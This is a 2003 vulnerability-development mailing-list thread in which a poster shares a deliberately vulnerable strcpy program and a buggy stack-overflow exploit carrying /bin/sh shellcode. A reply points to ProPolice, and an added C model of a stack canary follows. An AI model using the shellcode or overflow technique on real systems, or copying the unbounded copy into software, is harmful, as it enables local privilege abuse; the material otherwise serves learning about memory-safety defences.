Vulnerability Development mailing list archives
Re: Why doesnt work?
From: "Daniel Bartlett" <dan () lockedbox net>
Date: Thu, 9 Oct 2003 03:13:00 +0100 (BST)
I wonder which version of gcc you're using, if gcc at all. I wonder this because new releases of gcc contain some patches to help protect from buffer overflows, ProPolice. I found when experimenting with buffer overflows of a similar simple C proggie I needed the amount of data over the buffer size to be approx 20-30 chars more than the size of the buffer. Have you tried with a huge amount of data, like say double?

Cheers,
Daniel.

On 10/8/2003, "BORJA RUIZ CASTRO MORON" <padre () fedro ugr es> wrote:
Hi! I'm trying to exploit a little code:

-----------------------------------------------------------
// foo.c, vuln proggy
// compile gcc -o foo foo.c
//
#include <stdio.h>
#include <string.h>
#include <stdlib.h>   /* exit() */

int main (int argc,char **argv){
    char buffer[1024];
    if (argc < 2) {   /* argc is never 0 here; check for the missing argument */
        fprintf(stdout,"No argument found.");
        exit(-1);
    }
    strcpy(buffer,argv[1]);   /* unbounded copy into the 1024-byte buffer */
}
-------------------------------------------------------------------------

We see, if argv[1] > 1024, it will generate a segmentation fault, isn't it?

So, here is the exploit code:

// Exploit code 4 foo.c
//
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90

main (void) {
    char buffer[1032]; /* 1024 + 8 */
    int offset,i,ret;
    char *ptr,*ptr2;
    char shellcode[]=
        "\x31\xc0"              // xorl %eax,%eax
        "\x50"                  // pushl %eax
        "\x68\x6e\x2f\x73\x68"  // pushl $0x68732f6e
        "\x68\x2f\x2f\x62\x69"  // pushl $0x69622f2f
        "\x89\xe3"              // movl %esp,%ebx
        "\x99"                  // cltd
        "\x52"                  // pushl %edx
        "\x53"                  // pushl %ebx
        "\x89\xe1"              // movl %esp,%ecx
        "\xb0\x0b"              // movb $0xb,%al
        "\xcd\x80"              // int $0x80
        ;

    long get_sp(){
        __asm__ ("movl %esp,%eax");
    }

    help () {
        fprintf ("Usage: %s <offset>\n",argv[0]);
        exit(0);
    }

    if (!argc) help();
    offset=atoi(argv[1]);

    for (i=0;i<strlen(buffer);i++) {
        buffer[i]=0x00;
    }
    ptr=buffer;
    for (i=0;i<(strlen(buffer)-strlen(shellcode));i++) {
        *(ptr++)=NOP;
    }
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];
    }
    ptr2=(long *)ptr;
    for(i=0;i<8;i++) {
        *(ptr2++)=get_sp()+offset;
    }
    execl("./foo", "foo",buffer,0);
}
//EOF
--------------------------------------------------------

This exploit doesn't work, can you help me? Why doesn't it work? ARggg!!! Sorry for my poor English. Greetings from Spain!
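Daniel's point above, that a compiler guard such as ProPolice places a canary word between the local buffer and the saved return address and checks it before the function returns, as an added example that is not from this thread: a self-contained C model of a guarded frame. The offsets, guard value and return address are constructed for illustration and are not gcc's real layout.

```c
#include <stdint.h>
#include <string.h>

/* Constructed model of a guarded frame, after the ProPolice idea: the local
 * buffer lies lowest, a guard word sits above it, then the saved frame pointer
 * and the return address.  Offsets are illustrative, not gcc's real layout. */
#define BUF_SIZE   16
#define GUARD_OFF  BUF_SIZE
#define RET_OFF    (GUARD_OFF + 2 * sizeof(uint32_t))   /* guard, saved ebp */
#define FRAME_SIZE (RET_OFF + sizeof(uint32_t))

enum outcome { OK = 0, GUARD_TRIPPED = 1 };
struct frame { unsigned char bytes[FRAME_SIZE]; };

/* Prologue: zero the buffer, store the guard and a pretend return address. */
static void frame_init(struct frame *f, uint32_t guard, uint32_t ret) {
    memset(f->bytes, 0, FRAME_SIZE);
    memcpy(f->bytes + GUARD_OFF, &guard, sizeof guard);
    memcpy(f->bytes + RET_OFF, &ret, sizeof ret);
}

/* Model of an unchecked strcpy: the copy spills past the buffer into whatever
 * follows it.  Capped at the frame so the simulation stays well-defined. */
static void unchecked_copy(struct frame *f, const char *src) {
    size_t n = strlen(src) + 1;                /* strcpy copies the NUL too */
    memcpy(f->bytes, src, n > FRAME_SIZE ? FRAME_SIZE : n);
}

/* Epilogue check: compare the guard before the saved return address is used. */
static enum outcome check_guard(const struct frame *f, uint32_t guard) {
    uint32_t now;
    memcpy(&now, f->bytes + GUARD_OFF, sizeof now);
    return now == guard ? OK : GUARD_TRIPPED;
}

/* Run one input through the model; also reports the (possibly clobbered)
 * return slot so the caller can see how far the overflow reached. */
enum outcome run_input(const char *input, uint32_t *ret_out) {
    const uint32_t guard = 0xA5C3E107u;        /* constructed; real one is random */
    const uint32_t ret = 0x08048400u;          /* constructed return address */
    struct frame f;
    frame_init(&f, guard, ret);
    unchecked_copy(&f, input);
    if (ret_out) memcpy(ret_out, f.bytes + RET_OFF, sizeof *ret_out);
    return check_guard(&f, guard);
}

/* Convenience: the return slot's value after copying the given input. */
uint32_t ret_after(const char *input) { uint32_t r; run_input(input, &r); return r; }
```

An input that fits the buffer passes; one byte too many (the terminating NUL) already trips the guard before the return slot is touched, which is why a few extra bytes past the buffer size no longer crash silently on a guarded build.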
Current thread:
- Why doesnt work? BORJA RUIZ CASTRO MORON (Oct 08)
- Re: Why doesnt work? Daniel Bartlett (Oct 09)
- <Possible follow-ups>
- Re: Why doesnt work? Vade 79 (Oct 10)